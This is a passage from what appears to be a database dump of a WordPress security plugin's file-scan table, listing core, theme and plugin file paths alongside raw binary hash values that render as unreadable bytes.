5nh','',0,'?'),('dO*����weS�t�=','wp-includes/wp-includes/class-wp-walker.php',0,'z�+@,�G,��S^�y�','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('daM<M�=�[,&Y��7O','wp-includes/wp-includes/date.php',0,'n[*(Ҿ�w.m�y�z�','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('dg\nY\n���3�ql>��','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QRImage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�%9����p�\Z[h3 ','sNpT������O�2��Bx#�L0kK��oR�','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�}ch��V��L��/','�p�d������2a������o�I:��?�#@','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bsg@��Qw5���w\Z','̴f��|Bب苿����2n̙-C��~�p5�]�','',0,'?'),('d�K�/��\\�F��>7�','wp-content/plugins/redirection/locale/redirection-hr.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sr����]���S�','�����yWp��A�\r����/M���ù`�CVi��','',0,'?'),('d�g�!č�F���\\�mB','wp-content/plugins/wp-cerber/assets/fonts/cerber.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�TϦ)��fH@^','����V�r:z��/*��I��vG��g�X','',0,'?'),('d�|�x �YHq�D�~','wp-content/plugins/wp-smushit/app/views/dashboard/bulk/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:#�x\Z.�29��m0�','�W�i[�$?x���՞n���P>�i��V�O��','',0,'?'),('d�����&,�nU�I0�','wp-content/plugins/wordpress-seo/src/deprecated/admin/ryte/class-ryte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',g\\�Fp�t�B��f','I�+ɐ 1��>��<�\rl�~\0W��ψ�,�','',0,'?'),('d�k�kF�1R�0�.š','wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����ǡ��~�un','����_S4�]�?v;_U�N<�2F�','',0,'?'),('d��B���9Sh7Aw\n�','wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R��5��/�\"�','���hG�x(tʒ�\0�qG�a�E}TN8@�	','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0<N5Җo���uM','p�\"\r���<��P13�r��z���=����Ɠ]','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:@�&�\"L�\rg�(','�޼��/�M�����x���.Ԛё\n�t���H','',0,'?'),('d�+-C�ݲ�N��Q�','wp-content/plugins/wp-smushit/app/views/summary/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\zҳ��rǃxAu���','0��gD�kJBah��q���J����Iy\nx�\n','',0,'?'),('d�\r�	�}��������','wp-content/plugins/wordfence/js/date.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('d��1T�g�b���!','wp-includes/blocks/query-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IBE�nl�?��Kx�g','Z��wn\0��T7�Z\Z�޶ґѯ���ea�U','',0,'?'),('d���i�m$\'��.','wp-content/plugins/wp-cerber/assets/flags/hn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9[�L��y�� ��','���^���q����E�3�T�+֢ЍAp\0�','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('d�|��K<c��:8�Q�','wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݐ��تz���cy�','�eٺ�-�b&3PI��~���.R�[:�����;','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���ѱƔUy��{�','pa����i��v��INa\'%��fE?�Mv��','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[\'�|\")!ô\"�p','����\nd�P�K3*��R\'5Ē�� \Z���\'�?','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','推c�@g����h','ɿT���>�E�fg����K���� r��)�','',0,'?'),('e��(��8�����V','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-v3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~7^:�6�<V','\\Fta��P�_H<U���T�G_�o9�\Z�','',0,'?'),('e\"T����{�*xļ�','wp-content/themes/twentytwentythree/styles/block-out.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VA�V�sho�!�H�^�','�{�\\�*%��F�|L[����~d� �zUo1�u','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tH���)Ed�T�@�','���Ү�M�Cl;��}V����1�ʺ�)7ڠڅ','',0,'?'),('e.���w��w�E','wp-includes/wp-includes/images/wlw/wp-comments.png',0,'L�6]P����.s���','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('e0�8��/�;t�','wp-includes/blocks/tag-cloud/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$Ԍ��vȿ�{��d=','FVF�H>˻mi|k�5���	/�%p^t�:u%','',0,'?'),('e6�uV�@<?�wC��C','wp-content/plugins/wordpress-seo/src/helpers/wordpress-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ñ��܃����','�pj8A2�a�&�{� ����\"9|��ZX	;WV','',0,'?'),('eEq	�¢�++��5}','wp-content/plugins/wp-cerber/assets/flags/na.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�ʥ�/�Q1���','t�t��SZa}c����/Wp�?z��l�nrɌ�','',0,'?'),('eN)\"��y�\rU��|�','wp-content/plugins/wp-cerber/assets/flags/by.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G٪X��K~$�P��','F.��l!�ʦ�P�!һ������\"0�1�`','',0,'?'),('e_o;\0)o����z','wp-content/plugins/wp-smushit/core/external/plugin-notice/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']!��?G�R�y2=��Y','��%��J�\\4q^�$��U<R����>���z�l','',0,'?'),('ef�<�ؐ0аV�K-o','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png',0,'����\n�\nm\0;�˫�z','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Щ3�^7�DPk�@c_�l','e�����נc�1��0F��^�b��B�Q@Bu��','',0,'?'),('et��=L���K�q�','wp-content/plugins/redirection/locale/redirection-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~n�կ��^��','5��,��уV�����Ƽ��KR��V�y[XFv','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��\\��悗5O��','����5�l��Wf�@�.���N�Q�L�s','',0,'?'),('evrӸ>G��kD��/�','wp-includes/wp-includes/js/dist/block-editor.js',0,'L������k�H1��v','L������k�H1��v','���F��%w+7����k	�%���W��1Z�`!p','',0,'?'),('ex���R`���W��eG','wp-includes/wp-includes/js/wplink.js',0,'�7\"U��\"�?���','�7\"U��\"�?���','S\\��	���ٺ�\'?��I��75�{','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c��	;���*r3$X����G8ͬRK�','',0,'?'),('e�P:�߸E�jj\\3(�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-howto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�dsc��sk:K�','�����WKY�����T�3����������2�','',0,'?'),('e��G�����W�+S�','wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css',0,'#YR\nP��>�y�L�,','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('e�щ�G�7��X�?\0B','wp-content/plugins/wordpress-seo/admin/pages/social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A1_�S��v�K���','9 b�Ӡu�6��L&�US�b��t���نe','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('e�l��>����L�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�#�Z>B����;','��n/1��#w���22�+���U]��','',0,'?'),('e�\'���7�\r������','wp-includes/blocks/group/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���>��S�SG��',']�?��n���c\n7�|��@����)��~�VI)','',0,'?'),('eܷ�wY�O���I��\\','wp-content/plugins/wp-cerber/assets/flags/sy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a\n�o�\np�P�53�','0�|vՈ����ab��\n��/��=%S�/�UO�4','',0,'?'),('e�.�y���>���k','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=0M�5�؄����i0','W=:����iT�L��7�rƆ9Go��+����','',0,'?'),('e�7�Vw��ܸ�C�','wp-content/plugins/wordpress-seo/src/surfaces/classes-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D*�o�ʿl��','{���/?��>�m\'̨f2Q�pB�@#N�\r�','',0,'?'),('e�VT��1^2��]��','wp-includes/wp-includes/class-walker-category-dropdown.php',0,'m��s�ny�ld�)��','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('e�gXw�#&��l�l#�','wp-content/plugins/wordpress-seo/src/main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W	)1|t̠]u�/�','���w�m/T���L-���7�/�W�','',0,'?'),('f�d�Յs�2��#^�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css',0,'��A�V�t�Fƣ���','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('fH}��O=�\r���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�!��\'���8��','�{�R]����t.y&ڵ��W.�A��Q�����','',0,'?'),('f\r�������r�A','wp-includes/wp-includes/js/dist/data.min.js',0,'~Vew����MBE��|�\\','~Vew����MBE��|�\\','|;\n%��A����@P��L���剟�Ib��','',0,'?'),('fnF�ro����:�L�','wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�έ��VR�`X���','���zؒ��Nu�vw�q�I�[=�R��QE','',0,'?'),('f�z�l He��x�r�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Medium.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ދt1�FB�0�MOKQ>�','\\^/��d``�_�kf�ӑ�ހV�+��Y�D','',0,'?'),('fEa)riwC4X�ǚ�p','wp-content/plugins/wordpress-seo/src/helpers/site-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TK]�{@qVY��I��','�aj��M|s#�d[v��]]��\Z$�\ZҸ؟c�','',0,'?'),('fHb�\r�a]�Z�m','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/el.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m[\'Z�5G�VՇ','��3@���s���ԙMl�K��� �tyT�','',0,'?'),('fI܉�}�0���M���','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-auto@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J:�y@�6��i�=p','D�X(�U2�4�=�\" �=r���m��c�r','',0,'?'),('fM�,��N��V5ƾ ','wp-content/plugins/wp-fastest-cache/inc/cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǽl�K�l�*�.nY�','�ǽ��@���@��~SlDȅ1�,���v�','',0,'?'),('fO\Z�\n`\Z�E�S��','wp-content/plugins/wp-smushit/core/integrations/nextgen/class-thumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A1O��X��]��<7�','xhJ�f����8K�����D�^��xSc,`2','',0,'?'),('fdHrHpm{f��9<	','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontwatchrunner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-������V{','�`$��*İ��c�$ŏIvbK#�F���\\o��$8','',0,'?'),('feM�jq*���+��z','wp-content/plugins/wp-smushit/_src/scss/modules/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�G��H��O/�3;3_','u��d��\0J9,B�\"-x�ET�Հ��k��f�','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D��a���G]:','^Ķ�U�O�95E�ֹ�~��z��qM�q�3@','',0,'?'),('f��{\n�,�v�>� E','wp-includes/wp-includes/css/dist/components/style.css',0,'!���{9���YV?\'7�','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��܇����%�QA�','���I&>WKi�!%ͯ(7ԧQw���ْ]�#�%�d','',0,'?'),('f�F�A��l��Up���','wp-includes/blocks/post-featured-image/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K�D\\��U�','9�K�P�\r�X>��� �@A��7F���@��','',0,'?'),('f���N�]h�hIGZ','wp-includes/wp-includes/theme-compat/comments.php',0,'��Ϫ�-�Y�D��s��','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�R��6�����','x��c����Q,K4-e�($�g�S�HH','',0,'?'),('f��mȄ�%�#!y\r�','wp-includes/blocks/navigation-submenu/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$?f��c��,�4+p','~!�Cuw�}JD�5���FS��\\�O�ɭ��2�','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���o`Q[�.�','��_A6���}��K�\r9�@\rro���N�\Z�','',0,'?'),('f�j��P�QU��k��','wp-content/plugins/wordpress-seo/css/dist/modal-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2*�&���-	�t�%*�','����`�4A�`,I���	���X�a6�����\r','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���؃S�g\\\nGB�','���9�縙;�O[x`��*�8H�*r��.�P�','',0,'?'),('f��1̜��#rT�g-�','wp-includes/wp-includes/js/dist/warning.js',0,'�Kn����/���=�','�Kn����/���=�','�v�Q�m�����	�S-��#Qf��7�l3h}|','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xi�q�l�U�G�Ց','�g��P�L/�(O��)�G�.��G����n��E','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx�͊�m~d1�1O�Ѓ','>.�Y�,0#���奖C��V!�~[\Z�.S(v','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��me���8�����','}Ec���z�]#�n���w?y��R�a��0ޅ6','',0,'?'),('g\n��[�q��g-	i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�l�$��=g3�','./�R|��%�:�_���N����M�����Ԫ��','',0,'?'),('g�c�����ſ�4^','wp-includes/wp-includes/js/dist/rich-text.js',0,'y$�Bx!�u��񥰂�w','y$�Bx!�u��񥰂�w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),('g���j\Zr�։�`\Z�*','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js',0,'�OAZ�n�\0��?!*�W�','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),('g#L�ͬK�A]ea�2','wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mў�_���\\�+�','��2aƹ�\0��/��D�@a�b�1��<�̏','',0,'?'),('g%�6�� �P�5�@[f','wp-content/plugins/wordfence/css/license/care.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qC�*��&h)F','���\Zm�ʘ�:Nӹ���_\n8�Q&y\rx�_Qy�','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��qj�����$�c�','�(����Ual��c��M���aU-��#��','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�4�\0��ޮ�颺�','�Y����V��[��6#�\\���^uC�2�f�','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NeS�B��\'����A�','�\0%q݂.�CP̀���k*�c�㴷}kU#','',0,'?'),('gv��\ZUO��������','wp-includes/blocks/html/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�3�X8��<4)eK�b','<[n)3�a`T�!:�]���E��w{O���','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�W�M��&�8�3�6','TR@pe��S`F�aױC�>+�V�%�8�JyQ','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�K����N>J��4','wp-includes/blocks/freeform/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ğK��m��׀���','g1�g�,@2�_�s{��$���y�9s���7=�@','',0,'?'),('g�`�U/M	BH��Q�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kX�Zb����5��','[\0N����E�g����gd�q\r����*\'I�','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2~�Q;y@�/�6U&','�i>��lм�.+��7�[h֟w�Q�����','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g���ܿ�M\"$��J��','wp-content/plugins/wp-fastest-cache/inc/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?t\\[Vڠ��6�	I�','h��+��T�������cs��%==(�','',0,'?'),('gӁ�\"}�H��,�d�','wp-includes/blocks/social-links/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Z�@�k\rD�','��~��/�C0�)\0p�x�(���ۘ,�A','',0,'?'),('g�?���>�Z�Y�T�Gi','wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php',0,'���:�Z{���5�o','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('g����>@�3\"X0O','wp-content/plugins/wp-smushit/app/modals/reset-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈ�q4��#��R���','��Ȑj��oK����6�Xҽ�,���(�c','',0,'?'),('g�՛̒L�~�	�','wp-content/themes/hitmag/template-parts/featured-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r \nߕ�v?i	�\'�','@i.ׅ�%L��hW�V���7YT�\r��n�.','',0,'?'),('g���W��[�OU�\0�','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-usage@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kYM�aɛ2$�q���','����B�!�(\Zp���=�+G��6-�','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>}OP�8Z,Ob���>','�����:���D�a�!�ق�v����2\"!','',0,'?'),('g�+�_�P=�y�P�#','wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZvpZSr,sv�Z��','N�.������5�\\��������h��X g�Fz�','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|Ѯ	�:����','��F&�%3G%n�ߢCϒ�����{�a��','',0,'?'),('hi�FǷɵx��N�','wp-content/plugins/wordpress-seo/inc/language-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XY�mX[�t�\'�\\��ۧ','GE�dUw4\\�P��f6�G�����b��]�R','',0,'?'),('ha@E�]�.?�[֜�','wp-content/plugins/wp-cerber/assets/flags/tt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�\'���e�%��Z','�\'<��j%�w�wl�	�Ԇw6C��f]��[','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��Y��܈Fޏ�_�','g�݉��z]\"N��Y�+O�ҴDOU�؀&��0�~','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���N8�\'�F(kU��','ڝy�W���9>�p��54[�P�m�!Kd','',0,'?'),('h,�	��#=l��Ǖ ','wp-content/plugins/redirection/models/redirect/redirect-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��zU��<�a|_*l�','&�F���nn�6�]j��	�C;{\r&䮸�hE�e','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�K�e��t��J^5j','�,\Z�[#�5ԧ$ٔz��oUy9�����','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h?�+����UA��~��8','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D4��K�p;�A��','��[�w��#b>^��UA]_��~j��6Od��L','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����>�zd	s��_','JV/�T��~#�sa���{Ux.�7NV\n��[K','',0,'?'),('hc���=� ���0�','wp-includes/block-patterns/social-links-shared-background-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}��;`\Z�Դ��','>�**��?�-T*��H�%9�/��E�Vy�f�','',0,'?'),('hzV����z$=���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RedirectMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�%��2L�C�sp�',' ��ҠQ��M�2]��9�@b����-V�q','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h���!|�c+�sF�#NW','wp-includes/wp-includes/js/jquery/ui/effect-fold.js',0,'��}:h�B�կ}z�x�','��}:h�B�կ}z�x�','�����񀨯n�\r�S�/<���b���ե]Na�','',0,'?'),('h��I�a��mY�B��','wp-content/themes/hitmag/inc/kirki/modules/post-meta/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R:qxꜪر�*��','}υ�\"v���N���(��ǵ���B��lw','',0,'?'),('h�OT,$��(�������','wp-includes/blocks/site-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E ����f��,h','�N��U�|�[���ֺz����;z���<�','',0,'?'),('h��c!\\d/� 